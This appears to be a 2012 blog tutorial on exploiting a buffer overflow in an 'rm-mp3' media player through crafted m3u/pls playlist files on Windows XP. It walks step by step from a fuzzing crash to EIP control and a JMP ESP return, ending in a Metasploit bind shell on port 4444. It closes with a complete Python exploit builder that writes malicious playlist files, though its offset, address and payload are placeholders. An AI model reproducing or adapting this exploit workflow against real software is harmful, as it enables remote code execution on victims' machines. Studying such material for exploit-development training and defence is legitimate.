Monday, 13 February 2012

Buffer Overflow Exploit: rm-mp3


The exploit process is as follows:

EIP - DEAD BEEF - JMP ESP - payload

That is: overflow the buffer until the saved return address (EIP) is overwritten, first with the marker DEADBEEF to prove control of EIP, then with the address of a JMP ESP instruction so execution jumps to the stack, where the payload sits right after the overwritten return address.

The music application can be attacked through a crafted playlist file in one of these forms: ram, m3u or pls. Here I will create an m3u file (in Perl) and a pls file (in Python). In my attempts, the pls file was easier to use than the m3u file. The steps are as follows:


1. Open exploit-db to find out how the application can be exploited.




2. Try the exploit found in the database, such as:



3. Turn the exploit from the database into a fuzzing file in one of the playlist formats (ram, m3u or pls), then open the file in the application so that it crashes and can be taken over. *26121 is the size of the data sent to the application, which is what overflows its buffer.




4. Run the fuzzing file created earlier. The application crashes: EIP becomes 41414141 and EBX, ESP, EBP and ESI point at AAAAAAAA, which shows that our input has overwritten the stack.
*EIP is the register holding the address of the next instruction to execute, i.e. where the process goes next.





5. Go to /pentest/exploits/framework/tools and use the pattern tool there (Metasploit's pattern_create.rb) to replace the AAAA padding with a unique, non-repeating pattern, so that the value landing in EIP can be traced back to an exact offset. Then check whether EIP really changes.




6. Rebuild the fuzzing file from above so that it looks like this:


7. Run the fuzzer again. The application crashes again, but the AAAAAA values have now turned into the letters and digits of the pattern, and the value in EIP has changed accordingly.





8. Create a fuzzer that puts DEADBEEF into EIP, as follows:

9. It will then look like this: *EIP: DEADBEEF




10. Test whether the memory the registers point to can be filled with C characters. The fuzzer is:


11. The memory at the registers then looks like this: CCCCCCCCC





12. Search for a JMP ESP instruction (open shell32 in OllyDbg -> click -> search for JMP ESP). The address must not contain bytes that the playlist parser treats specially (a NUL or newline would cut the string short), and an address taken from a system DLL such as shell32.dll is only valid for that exact Windows version and service pack.






13. Change the data after EIP to CC by running the fuzzer below:



14. The data in the file then looks like this: CC

15. Mark the JMP ESP address with a breakpoint (toggle breakpoint in OllyDbg).


16. Open msfweb, the Metasploit web GUI.





17. Go to payloads -> search for win32 or windows xp -> search for bind shell -> fill in the fields as shown below. This gives a bind shell listening on port 4444 that can be reached with telnet.





18. Create the fuzzer file from the payload generated by the Metasploit web GUI, as follows:



19. Run the fuzzer and telnet in to get a shell on Windows XP: success


The telnet connection succeeded. After trying this with both file types combined, it worked.
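The whole procedure above (crash with A's, locate the EIP offset with a unique pattern, prove control with DEADBEEF, then swap in a JMP ESP address followed by the payload) is collected here in one Python script, as an added example; it is not the Perl/Python fuzzer from the original post, whose screenshots are not on this page. The EIP offset, the JMP ESP address and the payload bytes are placeholders and are labelled as assumptions: the real values come from the debugger, from the OllyDbg search in shell32, and from msfweb respectively. The pattern generator follows the Metasploit Aa0Aa1... scheme, and the offset lookup deliberately reports every match, because the post's buffer (26121 bytes) is longer than one pattern cycle (20280 bytes), so a single EIP value can match two offsets.

```python
import struct

ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ", "abcdefghijklmnopqrstuvwxyz", "0123456789")

TOTAL_LEN = 26121                  # size of the data sent in the post
DEADBEEF = b"\xef\xbe\xad\xde"     # 0xDEADBEEF, little-endian, as the EIP marker
# ASSUMPTIONS for illustration only, not findings from the post:
ASSUMED_EIP_OFFSET = 26000         # replace with the offset pattern_offsets() reports
ASSUMED_JMP_ESP = 0x11223344       # replace with the JMP ESP address OllyDbg shows
ASSUMED_PAYLOAD = b"\xcc" * 16     # stand-in for the msfweb bind-shell payload


def cyclic_pattern(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every 4-byte window is unique
    within one 20280-byte cycle; beyond that the pattern simply repeats."""
    buf = bytearray()
    while len(buf) < length:
        for a in ALPHABET[0]:
            for b in ALPHABET[1]:
                for c in ALPHABET[2]:
                    buf += (a + b + c).encode()
                    if len(buf) >= length:
                        return bytes(buf[:length])
    return bytes(buf[:length])


def pattern_offsets(eip_value, length):
    """Given EIP as read from the debugger (a 32-bit value such as 0x37694136),
    return every offset in the pattern where those bytes sit. With buffers
    longer than 20280 bytes there can be more than one candidate."""
    needle = struct.pack("<I", eip_value)
    pat = cyclic_pattern(length)
    hits, start = [], 0
    while True:
        i = pat.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def build_exploit(offset, eip_bytes, after_eip):
    """Layout from the post: [padding up to EIP][4 bytes into EIP][data at ESP]."""
    return b"A" * offset + eip_bytes + after_eip


def bad_char_positions(data, bad=b"\x00\x0a\x0d"):
    """Playlist files are parsed as text lines, so a NUL or newline inside the
    return address or payload would cut the overflow string short."""
    return [i for i, byte in enumerate(data) if byte in bad]


def playlist_file(kind, data):
    """Wrap the overflow string in the playlist format the player parses."""
    if kind == "m3u":
        return data + b"\n"
    if kind == "pls":
        return b"[playlist]\nFile1=" + data + b"\nTitle1=x\nLength1=-1\nNumberOfEntries=1\nVersion=2\n"
    raise ValueError("unknown playlist type: %s" % kind)


def stages(offset=ASSUMED_EIP_OFFSET, jmp_esp=ASSUMED_JMP_ESP, payload=ASSUMED_PAYLOAD):
    """The four fuzzer generations described in the post, keyed by step."""
    ret = struct.pack("<I", jmp_esp)
    filler = TOTAL_LEN - offset - 4
    return {
        "crash": b"A" * TOTAL_LEN,                                  # step 3/4: EIP = 41414141
        "pattern": cyclic_pattern(TOTAL_LEN),                        # step 6/7: EIP = pattern bytes
        "deadbeef": build_exploit(offset, DEADBEEF, b"C" * filler),  # step 8-11: EIP = DEADBEEF, C's at ESP
        "exploit": build_exploit(offset, ret, b"\x90" * 16 + payload),  # step 18: JMP ESP -> NOP sled -> payload
    }


if __name__ == "__main__":
    final = stages()["exploit"]
    problems = bad_char_positions(final)
    if problems:
        raise SystemExit("bad characters at offsets %s; pick another address/encoder" % problems)
    for kind in ("m3u", "pls"):
        with open("exploit." + kind, "wb") as fh:
            fh.write(playlist_file(kind, final))
    print("wrote exploit.m3u and exploit.pls (%d bytes of overflow data)" % len(final))
```

Running the script writes both playlist variants; the useful part is the workflow in between: after the crash with the pattern file, read EIP from the debugger and pass it to pattern_offsets() to get the offset, then set that offset and the JMP ESP address from OllyDbg before generating the final file.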




